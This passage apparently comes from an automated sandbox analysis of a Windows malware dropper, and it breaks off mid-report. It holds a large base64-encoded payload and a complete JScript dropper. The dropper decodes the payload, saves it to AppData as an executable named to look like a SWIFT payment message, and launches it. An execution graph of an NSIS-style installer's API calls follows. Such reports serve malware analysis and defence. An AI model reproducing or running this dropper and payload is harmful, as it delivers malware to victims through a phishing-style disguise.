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";
                          8
                          var silver = WScript.CreateObject ( "Microsoft.XMLDOM" );
                          • Windows Script Host.CreateObject("Microsoft.XMLDOM") ➔
                          9
                          var sinema = silver.createElement ( "tmp" );
                          • createElement("tmp") ➔
                          10
                          sinema.dataType = "bin.base64";
                            11
                            sinema.text = aso_ibora;
                              12
                              var sugar = WScript.CreateObject ( "ADODB.Stream" );
                              • Windows Script Host.CreateObject("ADODB.Stream") ➔
                              13
                              sugar.Type = 1;
                                14
                                sugar.Open ( );
                                • Open() ➔ undefined
                                15
                                sugar.Write ( sinema.nodeTypedValue );
                                • Write() ➔ undefined
                                16
                                var wshShell = WScript.CreateObject ( "WScript.Shell" );
                                • Windows Script Host.CreateObject("WScript.Shell") ➔
                                17
                                var tempdir = wshShell.ExpandEnvironmentStrings ( "%temp%" );
                                • ExpandEnvironmentStrings("%temp%") ➔ "C:\Users\engineer\AppData\Local\Temp"
                                18
                                var appdatadir = wshShell.ExpandEnvironmentStrings ( "%appdata%" );
                                • ExpandEnvironmentStrings("%appdata%") ➔ "C:\Users\engineer\AppData\Roaming"
                                19
                                var path = "SWIFT MO104978172_1301 EURO 9700.exe";
                                  20
                                  var is_temp = false;
                                    21
                                    if ( is_temp )
                                      22
                                      {
                                        23
                                        path = tempdir + "\\" + path;
                                          24
                                          }
                                            25
                                            else
                                              26
                                              {
                                                27
                                                path = appdatadir + "\\" + path;
                                                  28
                                                  }
                                                    29
                                                    sugar.SaveToFile ( path, 2 );
                                                    • SaveToFile("C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe",2) ➔ undefined
                                                    30
                                                    if ( path.endsWith ( ".jar" ) )
                                                    • "C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe".endsWith(".jar") ➔ false
                                                    31
                                                    {
                                                      32
                                                      wshShell.run ( "java -jar \"" + path + "\"" );
                                                        33
                                                        }
                                                          34
                                                          else
                                                            35
                                                            if ( path.endsWith ( ".vbs" ) || path.endsWith ( ".wsf" ) )
                                                            • "C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe".endsWith(".vbs") ➔ false
                                                            • "C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe".endsWith(".wsf") ➔ false
                                                            36
                                                            {
                                                              37
                                                              wshShell.run ( "wscript \"" + path + "\"" );
                                                                38
                                                                }
                                                                  39
                                                                  else
                                                                    40
                                                                    {
                                                                      41
                                                                      wshShell.run ( "\"" + path + "\"" );
                                                                      • run(""C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe"") ➔ 0
                                                                      42
                                                                      }
                                                                        43
                                                                        }
                                                                          44
                                                                          catch ( err )
                                                                            45
                                                                            {
                                                                              46
                                                                              }
                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:15.5%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:16.4%
                                                                                  Total number of Nodes:1386
                                                                                  Total number of Limit Nodes:22
                                                                                  execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 